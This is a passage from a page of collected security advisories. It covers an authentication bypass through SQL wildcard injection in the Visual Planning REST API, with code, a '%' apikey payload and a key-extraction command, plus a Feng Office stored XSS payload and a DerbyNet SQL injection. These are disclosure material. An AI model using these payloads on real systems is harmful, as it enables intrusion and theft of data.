/>2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by Lennert Preuth <br />and David Brown of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://www.visual-planning.com/en/<br />[1] <br />https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj<br />660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU<br />/h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo<br />rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4<br />PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA<br />C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl<br />r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w<br />KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P<br />um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx<br />+Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW<br />gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/<br />CTQ2Nugk2kdYf5d73FSO9ds=<br />=PvYR<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49231<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-003/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-003.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />A wildcard injection inside a prepared SQL statement was found in an <br />undocumented Visual Planning[0] 8 REST API route. The combination of <br />fuzzy matching (via LIKE operator) and user-controlled input allows <br />exfiltrating the REST API key based on distinguishable server responses. <br />If exploited, attackers are able to gain administrative access to the <br />REST API v2.0.<br /><br />Risk<br />====<br /><br />The vulnerability allows attackers to obtain a valid API key for the <br />Visual Planning REST API v2.0. With such a key, attackers can use <br />corresponding endpoints to exfiltrate company data or upload/download <br />files. If no external user management (e.g. LDAP) is configured, the API <br />key can also be used for user management tasks including the creation of <br />administrative users. Since administrators are allowed to upload modules <br />using the Visual Planning Admin Center, a compromise of the underlying <br />server is likely.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customers internet-facing assets. The software is <br />developed by STILOG I.S.T. and provides resource management and <br />scheduling features. A security assessment conducted by SCHUTZWERK found <br />an authentication bypass in Visual Planning's administrative REST API <br />v2.0.[1]<br /><br />Corresponding API routes are implemented in the PlanningWSRestV2.java <br />file. A comparison between the documentation and implemented routes <br />revealed an undocumented route (documentation accessed on 2024-03-05), <br />which is externally reachable via a GET request to the /session endpoint.<br /><br />The following code snippet shows the corresponding undocumented route, <br />which takes the value of the apikey header as an argument:<br /><br />vp.jar.src/com/visualplanning/webservice/PlanningWSRestV2.java<br />/* */ @GET<br />/* */ @Path("/session")<br />/* */ public Response openSession(@HeaderParam("apikey") String <br />apikey, @HeaderParam("keepalive") String keepalive) {<br />/* 123 */ if (apikey == null || apikey.trim().isEmpty()) {<br />/* 124 */ return <br />WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN, <br />apikey);<br />/* */ }<br />/* */<br />/* 127 */ WSSession session = WSSession.existsSession(apikey);<br />/* 128 */ if (session != null) {<br />/* 129 */ return <br />WSResponse.instance().error((Response.StatusType)Response.Status.FORBIDDEN, <br />"Already opened session for apikey : ", apikey);<br />/* */ }<br />/* */<br />/* 132 */ if (WSSession.getSession(apikey, (keepalive != null && <br />Boolean.parseBoolean(keepalive) == true)) == null) {<br />/* 133 */ return <br />WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN, <br />apikey);<br />/* */ }<br />/* 135 */ return WSResponse.instance().success("WSSession created <br />for apikey : " + apikey);<br />/* */ }<br /><br />Line 132 shows a call to the getSession(apikey, ...) method of the <br />WSSession class. Subsequently, the getSession(..) method will call the <br />makeSession(apikey, ..) method of the same class.<br /><br />The following code snippet shows the makeSession(..) method. Line 646 <br />contains the vulnerable prepared SQL statement, which is prone to <br />wildcard injections[2] due to the usage of the LIKE operator in <br />combination with user-controlled input:<br /><br />vp.jar.src/com/visualplanning/webservice/WSSession.java<br />/* */ private static WSSession makeSession(String apiKey, <br />WSSessionType type) {<br />/* 634 */ WSSession wsSession = new WSSession();<br />/* 635 */ WebApplicationContext applicationContext = <br />WebApplicationContext.getDefaultApplication();<br />/* 636 */ UserSession userSession = <br />applicationContext.createUserSession();<br />/* */<br />/* 638 */ DBConnection connection = <br />applicationContext.createUserSession().getDBConnection();<br />/* 639 */ String databaseName = <br />applicationContext.getProperty("Application", "Databasename", <br />"VisualPlanning7");<br />/* */<br />/* 641 */ connection.setPoolMode(false);<br />/* 642 */ connection.setDatabase(databaseName);<br />/* */<br />/* */ try {<br />/* 645 */ if (type == WSSessionType.CLIENT) {<br />/* 646 */ String planningQuery = "SELECT XMLContent FROM <br />Planning WHERE XMLContent LIKE ?";<br />/* 647 */ PreparedStatement stmt = <br />connection.createPreparedStatement(planningQuery);<br />/* 648 */ stmt.setString(1, "%<APIKey>" + apiKey + "</APIKey>%");<br />/* 649 */ ResultSet rs = stmt.executeQuery();<br />/* */<br />/* 651 */ if (!rs.next()) {<br />/* 652 */ return null;<br />/* */ }<br /><br /><br />The following GET request demonstrates the behavior of injecting a <br />percent sign as wildcard character:<br /><br />GET /vplanning/api/v2/session HTTP/1.1<br />Host: vp-host<br />apikey: %<br />[..]<br /><br />The server will respond with a success message, indicating that a <br />session was created for the used API key:<br /><br />HTTP/1.1 200<br />[..]<br /><br />WSSession created for apikey : %<br /><br />Further tests showed that an apikey header payload of '1%' will result <br />in a similar success response, if the api key starts with the character <br />'1'. A payload with a different non-matching first apikey character like <br />'2%' will result in a status code 403 and the error message 'Invalid API <br />key (2%)'.<br /><br />The proof-of-concept script brute_vp_apikey.py[3] was developed in order <br />to automate the process of exfiltrating the full apikey. The script can <br />be executed as follows against a vulnerable Visual Planning instance and <br />to extract the administrative api key:<br /><br />$ python3 brute_vp_apikey.py --url http://127.0.0.1:8080<br />Visual Planning API Key: 79d4add3-6995-8cae-976b-4aaaddd90616<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor suggests to update to Visual Planning 8 (Build 240207)<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contact vendor in order to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br />2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered by Lennert Preuth of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://www.visual-planning.com/en/<br />[1] <br />https://app.swaggerhub.com/apis-docs/VisualPlanning/visual-planning_api_rest_v_2_0_us/2.0-oas3<br />[2] <br />https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#sql-wildcard-injection<br />[3] https://www.schutzwerk.com/en/43/assets/advisories/brute_vp_apikey.py<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0QkaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvAZhAArh5MI5kM1lTjcIPPMiDS<br />VXJ51Z39qgcXySyrqrKslnP/2a/pfpakD8g161oOTSK/tt9Yd6L/6O5Vywe7Kx5V<br />lkVw7bs9J0WCY8aYzJ9RxdALt7HexAG+USgbjFWFajdSNNJ8giBu3P3ZCE8/GbHJ<br />0bKd8AN88NKL954olnI6qGbbnOr/QXWuIOWAYF9wXLgEk992hszYgt7SJIrFHuX6<br />2TC4iWOv4+72HQiQ8QYXCAZZVBDr3mUPQRBSJ9AZ3x7mxtJtMg8DyW0OATNe9Qlq<br />IUO7HFqrPwTQmFKf9whk8QD7/Y9dKTpAjlVzvXe49COqbjOzxmIe7muxwyVlOrqO<br />J9ZqreOr/ENLUgYDBaTLSTAHdEFNeqRGPK3dG0yiRSi3dtavJwr8PN1L52qTqLzT<br />C+Yrruu6Ac6pSin1Ea9WaXF+YS1ErRcbZxkRD5pS4s6V4NMkV4bDWlDtraQ0rDfL<br />AA+TxtA25p34S2MV/b3qAiA66UjrXEb6IJVNx4Rx7X3+gcLgI2w7t3DQEVuPaB3k<br />ltT1oV6ei7tqeQpn7usHzlfa6lq7Q3PIRpxYAo0g4kp4cVVblLRNWDpZMK+cBj1N<br />MrGP2f50gbpYej/yYHsXNU2pMfbUPoSq3X8uwVCoLvaBSBWx7I3TM1hl0/3wBi/w<br />phO+Bauh2QYGX2mFw/mduZM=<br />=ycwQ<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
<pre><code># Exploit Title: Feng Office version 3.10.8.21 - Stored XSS<br /># Exploit Author: tmrswrr <br /># Vendor Homepage: https://www.fengoffice.com/<br /># version 3.10.8.21 <br /><br />1 ) Login admin https://127.0.0.1/Feng_Office/index.php?c=access&a=index#<br />2 ) Click Tasks > "><img src=x onerrora=confirm() onerror=confirm(1)> add task <br />3 ) Click Add worked hours you will be see xss alert<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-30923<br /><br />Description:<br />An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.<br /><br />Vulnerability Type: SQL Injection<br /><br />Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet<br /><br />Affected Product Code Base: DerbyNet - v9.0<br /><br />Affected Component: print/render/racer.inc<br /><br />Attack Type: Remote<br /><br />Impact:<br />- Code execution: True<br />- Information Disclosure: True<br /><br />Attack Vectors:<br />The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:<br />- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`<br /><br />This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.<br /><br />Discoverer: Valentin Lobstein<br /><br />References:<br />- Official website: http://derbynet.com<br />- Source code on GitHub: https://github.com/jeffpiazza/derbynet<br /><br /></code></pre>